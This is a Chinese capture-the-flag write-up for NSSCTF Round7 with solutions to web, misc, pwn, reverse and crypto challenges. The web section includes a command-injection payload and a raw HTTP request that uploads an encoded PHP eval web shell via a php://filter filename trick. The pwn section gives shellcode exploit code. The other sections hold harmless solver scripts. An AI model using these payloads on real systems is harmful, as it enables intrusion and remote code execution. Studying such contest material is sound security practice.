NSSCTF Round7 WP
还不错,一个全场唯一解一个二血,队友还拿了一个一血(KoH)两个二血
Web
F | ez_RCE | Doxxx
action=1'&data=;cat /flag %23'
2 | OoO | Doxxx
POST /Ns_SCtF.php?NSSCTF[]=1&NsSCTF[]=2&NsScTf=data://text/plain;base64,V2VsY29tZSB0byBSb3VuZDchISE=&NsScTF=1a&nss[ctfer.vip=1&NSScTf=0337522&nSScTF=1&nSscTF=NSSRound7 HTTP/1.1
Host: 43.143.7.127:28734
Content-Length: 580
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryarnwHDEBVmc9Vybv
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="NsScTf"
Welcome to Round7!!!
------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="file"; filename="%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%64%65%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%31%2e%70%6e%67%2e%70%68%70"
Content-Type: image/jpeg
aaaPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+
------WebKitFormBoundaryarnwHDEBVmc9Vybv
Content-Disposition: form-data; name="submit"
提交
------WebKitFormBoundaryarnwHDEBVmc9Vybv--
Misc
1 | brokenFilterChain | App1e_Tree
认真读文档就行,实际上我们需要解析这里的四十多行,每行代表一个字符
https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT 这里有相关字符对应的字符串,转换之后倒序(文档里也提到了)字符串解base64
NssssCTFeyAgphhpRmlsdGVyQ2hhMW5fW4sS0FunICB9GyQp
后面W4sS0Fun不用解base64,凑一凑flag就出来了,好像是下面这个,记不住了
NssssCTF{FilterCha1n_W4sS0Fun}
一血,并且全场一解
2 | Ikun的电脑 | App1e_Tree
把有用的提出来
1.5那里有段音频,开头有噪声,放大看是0 1序列
单独放到一个声道,工具->采样数据导出,根据数据正负填写对应0 1,查一下发现是zip
直接解开zip,Recover File Password,得到1.12里面zip的密码
得到图片如下
查一下图片大小3500* 3500,一共35* 35张图片,分别代表0 1,提取一下两张100* 100大小的图片,这里用的ImageMagick Display
然后找两张图片不同像素点做对比,写个脚本就好了
exp:
from PIL import Image
right=Image.open('1.png')
left=Image.open('2.png')
r=right.getpixel((50,50))
l=left.getpixel((50,50))
img=Image.open('flag.png')
res=Image.new('RGB',(35,35))
for x in range(35):
for y in range(35):
orix=100*x-50
oriy=100*y-50
p=img.getpixel((orix,oriy))
if p==r:
res.putpixel((x,y),(255,255,255))
else:
res.putpixel((x,y),(0,0,0))
res.save('haha.png')
然后扫就行了
Pwn
1 | 奇你太美 | emmm
跳回去再读一次shellcode,strncpy有点坑,src为0的话会把0x10000的内容都清空,就改rbp做了,让他自己再把shellcode拷贝一次去执行
exp:
from pwn import *
context.arch = 'amd64'
shellcode = '''
mov edi,0x01033103
xor edi,0x01011101
shr edi,1
push rdi
pop rbp
add edi,-0x211
mov [edi],edi
mov eax,[edi]
pop rbx
mov bl,75
push rbx
ret
'''
write_txt = '''
/*open */
xor rax,rax
mov edi,edx
mov dil,36 /*/nss.txt*/
push 0x41
pop rsi
shr edx,8
mov dl, 0xff
mov al,0x2
syscall
/*write txt*/
mov esi,edi
mov sil,30
mov edi,eax
mov al,1
syscall
'''
payload = asm(shellcode) + b'\x00'
print(len(asm(write_txt)))
payload2 = asm(write_txt) + b'nss666/nss.txt\x00'
#exit(0)
for i in range(len(payload)):
# if payload[i] & 1 == 0:
# assert(False)
print('%d',payload[i])
with open('shellcode','wb')as f:
f.write(payload)
f.write(payload2)
Re
2 | Tetris | emmm
直接用CE改内存就行
Crypto
F | 裁雨留虹 | App1e_Tree
q的低151位被noise数据干扰,p q高位满足相加二进制全1,p-q越小,相乘结果越大,初始让p全为1,q全为0,不断调整,得到q高512-151bit,然后coppersmith解低位
exp:
from Crypto.Util.number import *
import gmpy2
n=9917194039107056112184040918942991087006948095942990759083653963386347099537872574166056046291870369660144747910297948865119742599237172372299988293988091347394105128159638670279156137176691709760735170161276067729520093855522898374683007605621773716069049053067108582990968946937131419271617984877669716809
e=65537
c=7587789694070748707348883888501708440754567305328311759140303893816709636596826176623331039561461438614968853491941771170730448862622628116994823624292597456598154540152890431881836541630974352792727975698270205577342357896211852053562431611816629189278379946359321494584849773739040563488839129619217040844
p=((1<<512)-1)^^((1<<151)-1)
q=0
for i in range(510,150,-1):
bit=1<<i
if (p^^bit)*(q^^bit)<n:
p^^=bit
q^^=bit
P.<x>=PolynomialRing(Zmod(n))
for i in range(150,230):
f=x+ZZ(((p>>i)<<i))
root=f.small_roots(X=2^i,beta=0.4)
if root!=[]:
p=root[0]+ZZ(((p>>i)<<i))
break
q=ZZ(n)//ZZ(p)
phi=ZZ((p-1)*(q-1))
d=gmpy2.invert(e,phi)
flag=ZZ(pow(c,d,n))
print(long_to_bytes(flag))
#NSSCTF{e75a2dbf-8581-49bf-a125-383cca7fd377}
标签:65%,edi,mov,35,write,WP,Round7,txt,NSSCTF
From: https://www.cnblogs.com/App1eTree/p/17070788.html